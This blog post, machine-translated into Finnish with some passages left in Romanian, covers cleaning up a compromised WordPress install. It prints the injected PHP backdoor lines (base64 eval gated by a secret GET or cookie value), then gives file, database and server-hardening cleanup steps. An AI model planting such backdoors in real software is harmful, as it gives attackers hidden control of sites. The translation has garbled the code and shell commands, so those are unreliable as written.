kirjoittaja

1

WordPress Exploit – Virustiedostojen puhdistus, SQL- ja palvelinsuojaus.

WordPress Exploit – Virustiedostojen puhdistus, SQL- ja palvelinsuojaus.

1

Ennen kuin luet tämän postauksen, sinun täytyy nähdä postaus täällä, ymmärtääkseen jotain. :)

Löysin useista stealthsettings.com-sivuston blogien tiedostoista alla olevien kaltaisia ​​koodeja, jotka ilmestyivät tartunnan seurauksena WordPressin hyödyntäminen.:

<?php if($_GET['573abcb060974771']==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST['tiedosto'])); poistua; } ?>

ja

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['tiedosto'])); poistua; } ?>

xmlrpcYllä olevassa tapauksessa kyse on tiedostosta xmlrpc.php niistä Unelias, mutta yhdellä grep palvelimella voidaan nähdä, että lähteissä on melko paljon tällaisia ​​koodeja.

pppffiuuu

Tartunnan saaneiden tiedostojen puhdistaminen:

Oooookkkk…
1. Paras ratkaisu, kun se on tehty varmuuskopio- ja puhdistanut tietokannan, se on sa POISTAA tiedostot WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.

Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['tiedosto'])); poistua; } ?><?php get_header(); ?>

2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.

find . -name*_new.php
find . -name*_old.php
find . -name*.jpgg
find . -name*_giff
find . -name*_pngg
find . -namewp-info.txt

3. in /tmp , etsi ja poista kansioita, kuten tmpYwbzT2

SQL-siivous -

1. taulukossa taulukko wp_options katso onko se olemassa ja poista rivit: sisäinen_linkkien_välimuisti, rss_f541b3abd05e7962fcab37737f40fad8 ja wordpress_optiot.

2. Siirry myös kohtaan wp_options Active_plugins ja poista, jos sellainen on, laajennus, joka päättyy johonkin laajennuksista *_new.php, *_old.php, *.jpgg, *.giff, *.pngg tai jos kyseessä on toinen epäilyttävä laajennus, tarkista huolellisesti.

3. Taulukossa wp_users, katso, onko sarakkeessa käyttäjää, jonka oikealle puolelle ei ole kirjoitettu mitään user_nicename. Poista tämä käyttäjä, mutta muista ID-sarakkeen numero. Tämä käyttäjä todennäköisesti käyttää "WordPressiä" nimellä user_login ja näyttää siltä, ​​että se luotiin päivämääränä 00:00:00 0000-00-00.

4. Mene pöytään wp_usermeta ja poista kaikki rivit, jotka kuuluvat yllä olevaan tunnukseen.

Kun olet tehnyt tämän sql-puhdistuksen, deaktivoi ja aktivoi sitten jokin laajennus. (blogissa -> Kojelauta -> laajennukset)

Palvelimen suojaus:

1. Katso mitkä hakemistot ja tiedostot ovat "kirjoitettava” (chmod 777) ja yritä laittaa a chmod joka ei enää salli heidän kirjoittamista millään tasolla. (esim. chmod 644)

löytää. -perm -2 -ls

2. Katso mitkä tiedostot asettavat bitin etelään tai liukua . Jos et käytä näitä tiedostoja, laita ne chmod 0 tai poista ne sisältävä paketti. He ovat erittäin vaarallisia, koska he teloittavat etuoikeuksilla "ryhmä"Tai"juurtua" eikä sitä tiedostoa suorittavan tavallisen käyttäjän oikeuksilla.

etsi / -tyyppi f -perm -04000 -ls
etsi / -tyyppi f -perm -02000 -ls

3. Tarkista, mitkä portit ovat auki ja yritä sulkea tai suojata portit, jotka eivät ole käytössä.

netstat -an | grep -i lista

Siinä se. Minä näen sen jotkut blogit on kielletty Google-haussa ja muut sanovat "Hyvin tehty!!!" . No, olisin tehnyt sen heidän puolestaan...mutta mitä sanot, jos Google alkaa kieltää kaikki sivustot jotka tekevät LÄHTÄN roskapostia ja pakkaa troijalaisia ​​(Trojan.Clicker.HTML) evästeissä?

WordPress Exploit – Virustiedostojen puhdistus, SQL- ja palvelinsuojaus.

Saatat olla kiinnostunut myös...

Yksi ajatus “WordPress Exploit – Virustiedostojen puhdistus, SQL- ja palvelinsuojaus.

  1. Pingback: Katso Muutin teeman | Krumel ei ole mitään

Jätä vastaus

Sähköpostiosoitettasi ei julkaista. Vaadittavat kentät on merkitty *